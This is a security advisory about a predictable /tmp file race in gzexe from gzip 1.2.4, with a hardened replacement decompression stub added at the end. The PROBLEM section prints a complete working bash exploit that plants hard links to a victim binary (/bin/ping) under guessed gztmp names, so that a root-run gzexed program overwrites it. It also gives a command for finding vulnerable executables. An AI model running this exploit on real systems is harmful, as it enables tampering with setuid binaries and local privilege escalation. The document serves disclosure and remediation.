COMMAND

    gzexe (gzip 1.2.4)

SYSTEMS AFFECTED

    Systems running gzexe

PROBLEM

    Michal Zalewski posted the following vulnerability he found.  GZEXE,
    part of the gzip package, is a small utility which allows 'transparent'
    compression of any kind of executable (just like pklite under MS-DOS).
    Unfortunately, it may be extremely dangerous.  Here's the shell script
    used for decompression:

        if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
        [...]                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        /tmp/gztmp$$ ${1+"$@"}; res=$?
        ^^^^^^^^^^^^

    This is an example of a badly-written one.  It's possible to overwrite
    any file (including SUIDs!) with the code of the gzexed executable when
    root executes it...  Then this unwanted suid may be easily exploited.
    It's also possible to force execution of OUR OWN code instead of the
    gzexed program, just by choosing as a victim any file not owned by the
    user running the vulnerable executable, but writable by him/her.  This
    file (even setuid) may be freely modified by the attacker.  Exploit
    code follows:

    #!/bin/bash

    # GZEXE executables exploit (gzip 1.2.4)
    # by Michal Zalewski (lcamtuf@staszic.waw.pl)
    # ---------------------------------------------

    VICTIM=/bin/ping
    GZEXED=a.out

    # Note: to locate gzexed executables you may use this:
    # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

    if [ ! -f $VICTIM ]; then
      echo "I can't find my victim ($VICTIM)..."
      exit 0
    fi

    ORIG=`ls -l $VICTIM|awk '{print \$5}'`

    echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

    renice +20 $PPID >&/dev/null

    cd /tmp

    touch $GZEXED

    while :; do

      START=`ps|awk '$6=="ps"{print $1}'`

      let START=START+100
      let DO=START+100

      while [ "$START" -lt "$DO" ]; do
        ln $VICTIM gztmp$START &>/dev/null
        let START=START+1
      done

      sleep 10

      rm -f gztmp* &>/dev/null

      NOWY=`ls -l $VICTIM|awk '{print \$5}'`

      if [ ! "$ORIG" = "$NOWY" ]; then
        echo "Done, my master."
        exit 0
      fi

    done

    It may be left in the background.  Please verify the vulnerable
    executable filename (GZEXED - you may specify more than one file,
    separated by spaces).

SOLUTION

    Do not use gzexe to compress executables.  That's all; TMPDIR will
    NOT help in this case, because the stub hard-codes /tmp.  A patch is
    expected to be released soon.  This /tmp race was fixed in OpenBSD
    back in August 1997, so OpenBSD 2.2 does not look vulnerable.
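    As an added example (not gzip's own code and not part of the original
    advisory), here is a hardened version of the decompression stub quoted
    under PROBLEM: it writes only into a private directory from mktemp -d
    and refuses to overwrite an existing file.  The function names
    build_sample, decompress_to and safe_extract, and the constructed
    'skip=N' file layout, are assumptions made for this example.

```shell
#!/bin/sh
# Hardened re-implementation of the gzexe decompression stub (added example,
# not gzip's own code). The original stub writes to the predictable
# /tmp/gztmp$$ with a plain '>' redirect, so whatever already sits at that
# name (a file, a hard link to something else) is truncated and overwritten.
# Two defences are combined here:
#   1. decompress only into a fresh mode-0700 directory from mktemp -d, whose
#      name no other user can predict or pre-populate;
#   2. open the output with noclobber (set -C), so an existing file makes the
#      redirect fail instead of being overwritten.
# The file layout is constructed to mimic gzexe: a shell header containing a
# 'skip=N' line, where N is the line on which the appended gzip stream starts.

build_sample() {          # $1 = path; writes a constructed self-extracting file
    printf '#!/bin/sh\nskip=4\n# gzip stream follows\n' > "$1"
    printf '#!/bin/sh\necho hello-from-payload\n' | gzip -c >> "$1"
}

# decompress_to SRC SKIP DEST: write SRC's payload to DEST; returns non-zero
# (and leaves DEST untouched) if DEST already exists.
decompress_to() {
    ( set -C; tail -n "+$2" "$1" | gzip -cd > "$3" ) 2>/dev/null
}

# safe_extract FILE [ARGS...]: decompress FILE's payload into a private
# directory, run it with ARGS, clean up, and return the payload's status.
safe_extract() {
    f=$1; shift
    # read skip= from the header only; 'exit' stops awk before the binary part
    skip=$(awk -F= '$1 == "skip" && $2 ~ /^[0-9]+$/ { print $2; exit }' "$f")
    [ -n "$skip" ] || { echo "no skip= line in $f" >&2; return 2; }
    dir=$(mktemp -d "${TMPDIR:-/tmp}/gzexe.XXXXXX") || return 2
    tmp=$dir/payload
    if ! decompress_to "$f" "$skip" "$tmp"; then
        rm -rf "$dir"; return 2
    fi
    chmod 700 "$tmp"
    "$tmp" "$@"
    res=$?
    rm -rf "$dir"
    return "$res"
}
```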